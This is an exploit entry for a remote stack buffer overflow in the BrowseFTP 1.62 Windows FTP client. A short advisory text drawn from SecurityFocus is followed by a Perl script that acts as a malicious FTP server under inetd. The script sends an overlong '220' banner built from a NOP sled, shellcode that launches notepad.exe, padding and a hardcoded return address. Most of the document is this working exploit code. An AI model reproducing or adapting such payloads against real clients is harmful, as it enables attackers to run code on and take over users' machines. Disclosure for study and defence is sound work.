BrowseFTP Client 1.62 - Remote Buffer Overflow

source: https://www.securityfocus.com/bid/3781/info

BrowseFTP is an ftp client that runs on various Microsoft Windows operating systems.

An issue has been reported which could allow for a malicious ftp server to execute arbitrary code on a BrowseFTP client user.

This is acheivable when a BrowseFTP user connects to an ftp host, if the FTP server '220' response is of excessive length. The stack-based overflow condition can allow for malicious administrators to execute arbitrary code on (and gain control of) client hosts. It is also possible to crash the client. 

#!/usr/local/bin/perl

#------------------------------------------------------------------------
# Browse FTP exploit( run under inetd )
# written by Kanatoko 
# http://www.jumperz.net/
#------------------------------------------------------------------------
$|=1;

	#egg written by UNYUN (http://www.shadowpenguin.org/)
$egg  = "\xEB\x22\x5B\x53\x32\xE4\x83\xC3\x0B\x88\x23\xB8\x24\x98\x01\x78";
$egg .= "\xFF\xD0\x33\xC0\x50\xB4\x78\xC1\xE0\x10\x33\xDB\x66\xBB\x04\x55";
$egg .= "\x0B\xC3\xFF\xD0\xE8\xD9\xFF\xFF\xFF";
$egg .= "notepad.exe";

	#018DFB20
$ret = "\x20\xFB\x8D\x01";

$buf = "\x90" x 2428;
$buf .= $egg;
$buf .= "A" x 299;
$buf .= $ret;

print "220 $buf\r\n";